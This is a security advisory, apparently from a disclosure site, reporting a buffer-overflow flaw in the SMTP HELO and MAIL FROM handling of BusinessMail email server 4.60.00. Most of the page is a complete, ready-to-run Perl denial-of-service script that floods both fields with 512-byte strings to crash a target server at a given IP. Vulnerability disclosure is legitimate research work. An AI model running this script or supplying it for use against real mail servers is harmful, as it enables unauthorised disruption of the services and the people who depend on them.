|
Brought to you by:
Suppliers of:
|
|
|
| |
"BusinessMail is a powerful and yet easy to configure mail server that has been designed from its initial concept as a full Windows 32bit, multi-threaded system that will provide the power and flexibility of mail handling that is required by most business network environments."
Lack of proper length validation of two fields allows attackers to crash BusinessMail email server system. |
| |
Credit:
The information has been provided by Reed Arvin.
The original article can be found at: http://reedarvin.thearvins.com/20050730-01.html
|
| |
Vulnerable Systems:
* BusinessMail email server system 4.60.00
The Input of the SMTP HELO and MAIL FROM: fields are not properly checked, and allow attackers to cause buffer overflow when issuing a long data for the HELO and MAIL FROM: fields, causing the process to crash.
Exploit:
#===== Start BusMail_SMTPDOS.pl =====
#
# Usage: BusMail_SMTPDOS.pl <ip>
# BusMail_SMTPDOS.pl 127.0.0.1
#
# BusinessMail email server system 4.60.00
#
# Download:
# http://www.netcplus.com/
#
##########################################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "25",
Proto => "TCP"))
{
print "Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\n";
sleep(1);
print $socket "HELO " . "A" x 512 . "\r\n";
sleep(1);
print $socket "MAIL FROM:" . "A" x 512 . "\r\n";
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:25\n";
}
#===== Start BusMail_SMTPDOS.pl =====
|
|
|
|
|
